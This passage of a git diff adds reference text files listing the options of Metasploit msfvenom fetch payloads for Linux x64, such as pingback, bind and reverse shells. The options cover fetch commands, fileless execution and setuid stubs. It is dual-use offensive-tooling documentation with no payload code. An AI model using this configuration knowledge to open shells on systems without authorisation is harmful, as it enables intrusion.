both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME caEBFkqCr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Accept a connection from attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-pingback_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-pingback_reverse_tcp.txt new file mode 100644 index 0000000..409be8f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-pingback_reverse_tcp.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux x64 Pingback, Reverse TCP Inline + Module: payload/cmd/linux/http/x64/pingback_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME yQxryUKTSxWl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and report UUID (Linux x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..f4d9dc7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell-bind_tcp.txt @@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Stager + Module: payload/cmd/linux/http/x64/shell/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JBiyJSJk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_sctp.txt new file mode 100644 index 0000000..8b4acd2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_sctp.txt @@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse SCTP Stager + Module: payload/cmd/linux/http/x64/shell/reverse_sctp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DZKWFBbuk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..9e08905 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell-reverse_tcp.txt @@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + ricky + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NhQhQUrqRBKq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..3073463 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_ipv6_tcp.txt @@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/http/x64/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME nejxgfqQY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..dde3e35 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp.txt @@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/x64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME xeIcJbCNd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..61adaa0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_bind_tcp_random_port.txt @@ -0,0 +1,70 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/http/x64/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME whMJpeucr no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_find_port.txt new file mode 100644 index 0000000..2df29c4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_find_port.txt @@ -0,0 +1,73 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/http/x64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 91 + Rank: Normal + +Provided by: + Brendan Watters + mak + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 63540 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eRpNwkkNw no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_ipv6_tcp.txt 